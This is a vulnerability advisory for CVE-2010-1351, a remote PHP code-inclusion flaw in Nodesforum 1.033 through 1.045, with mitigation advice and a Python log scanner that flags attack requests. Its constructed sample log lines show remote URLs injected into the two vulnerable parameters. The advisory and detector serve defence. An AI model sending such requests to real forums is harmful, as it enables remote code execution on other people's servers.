PT-2010-3048 · Nodesforum · Nodesforum

Published: 2010-04-12 · Updated: 2017-08-17 · CVE-2010-1351

CVSS v2.0: 6.8 (Medium)

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions
Nodesforum versions 1.033 through 1.045

Description
The issue allows remote attackers to execute arbitrary PHP code when register_globals is enabled. This can be achieved via a URL in the _nodesforum_path_from_here_to_nodesforum_folder parameter to erase_user_data.php and the _nodesforum_code_path parameter to pre_output.php.

Recommendations
For versions 1.033 through 1.045, consider disabling the register_globals setting to prevent exploitation. Additionally, restrict access to the erase_user_data.php and pre_output.php scripts until a fix is available. Avoid using the _nodesforum_path_from_here_to_nodesforum_folder and _nodesforum_code_path parameters in these scripts until the issue is resolved.
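
While access to the two scripts is being restricted, web server logs can be checked for requests that match the description. The following is an added example, not code from this advisory or from the Nodesforum project: it flags log entries where either script receives a URL in its parameter. It assumes the script and parameter names are spelled with underscores (erase_user_data.php, pre_output.php, _nodesforum_path_from_here_to_nodesforum_folder, _nodesforum_code_path) and that logs use the common combined format; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script -> parameter pairs from the description (underscore spelling assumed).
TARGETS = {
    "erase_user_data.php": "_nodesforum_path_from_here_to_nodesforum_folder",
    "pre_output.php": "_nodesforum_code_path",
}
# Value that begins with a URL scheme such as http:// or ftp:// (two or more
# characters before the colon, so a lone drive letter is not matched).
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]+:", re.IGNORECASE)
# Request line of an access-log entry (combined log format assumed).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_request(log_line):
    """Return (script, parameter, value) when a listed script receives a URL
    in its listed parameter, otherwise None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    script = target.path.rsplit("/", 1)[-1].lower()
    param = TARGETS.get(script)
    if param is None:
        return None
    # parse_qs percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
    for value in parse_qs(target.query, keep_blank_values=True).get(param, []):
        if SCHEME.match(value.strip()):
            return (script, param, value)
    return None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(flag_request, lines) if hit]

# Constructed sample entries (documentation addresses and an .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Apr/2010:10:00:01 +0000] "GET /forum/erase_user_data.php'
    '?_nodesforum_path_from_here_to_nodesforum_folder=http://host.invalid/x HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Apr/2010:10:00:02 +0000] "GET /forum/pre_output.php'
    '?_nodesforum_code_path=http%3A%2F%2Fhost.invalid%2Fx HTTP/1.1" 200 87',
    '198.51.100.4 - - [12/Apr/2010:10:00:03 +0000] "GET /forum/index.php?page=2 HTTP/1.1" 200 4096',
    '198.51.100.4 - - [12/Apr/2010:10:00:04 +0000] "GET /forum/pre_output.php HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

This covers query strings only; with register_globals enabled, POST bodies and cookies also populate variables and do not appear in a standard access log.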

Exploit

Fix

Code Injection


Weakness Enumeration

Related Identifiers

CVE-2010-1351

Affected Products

Nodesforum